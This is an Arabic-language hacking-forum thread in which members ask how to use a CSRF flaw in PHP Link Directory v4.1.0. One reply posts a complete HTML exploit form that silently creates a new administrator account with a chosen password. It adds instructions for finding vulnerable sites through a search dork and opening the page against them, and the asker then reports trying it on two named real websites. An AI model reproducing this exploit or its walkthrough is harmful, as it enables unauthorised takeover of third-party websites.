شرح ثغراة PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)

**العرفى** · 01-28-2011, 01:59 PM

اخوانى لقيت الثغاره هذا بس ما عرفت كيف استفيد منها
http://www.expbase.com/WebApps/13742.html
ممكن شرح بسيط
كتابي او با الصور
وشكرااااااااا

**الهكر المنتظر** · 01-28-2011, 02:03 PM

والله انا زيك

بس اخوي ابي استفسرك كيف خلي الخط حق الموضوع كبير

**T!F!NaR** · 01-28-2011, 02:48 PM

السلام عليكم
الموضوع ليس في قسمه المناسب
لكن
ابحث عن المواقغ بالدروك Powered by: PHP Link Directory
اختر موقع
و انسخ هدا الكود
<html>
<head>
<title>PHP Link Directory v4.1.0 [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N">
<input type="hidden" name="LOGIN" value="webmaster"/>
<input type="hidden" name="NAME" value="Mohammad Hussien"/>
<input type="hidden" name="PASSWORD" value="123456"/>
<input type="hidden" name="PASSWORDC" value="123456"/>
<input type="hidden" name="LANGUAGE" value="sq"/>
<input type="hidden" name="EMAIL" value="example@hotmail.com"/>
<input type="hidden" name="cemail" value="1"/>
<input type="hidden" name="LEVEL" value="1"/>
<input type="hidden" name="formSubmitted" value="1"/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="exclude_id" value=""/>
</form>

وضعه في ملف نصي جديد و احفظه بصيغة html

عوض http://localhost االموقع المصاب

Mohammad Hussien

باسم المدير الادمن الجديد
و العدد 123456 الباسوورد الجديد
و احفظ الملف
ا وفتحه في المتصفح
وشوف النتيجة مرضية جدا
تحياتي لك

**الهكر المنتظر** · 01-28-2011, 02:55 PM

اخي انا ماني فاهم هذا الكلام

عوض http://localhost االموقع المصاب

Mohammad Hussien

باسم المدير الادمن الجديد
و العدد 123456 الباسوورد الجديد
و احفظ الملف
ا وفتحه في المتصفح
وشوف النتيجة مرضية جدا
تحياتي لك

ارجو التوضييح

**العرفى** · 01-28-2011, 04:27 PM

مشكور اخى على الشرح بس النتيجة كانت
CSRF Add Admin By AtT4CKxT3rR0r1ST هذا ما يظهر لي
والتجربة كانت على
http://poweredbyphpld.com/
http://www.republicapr.com/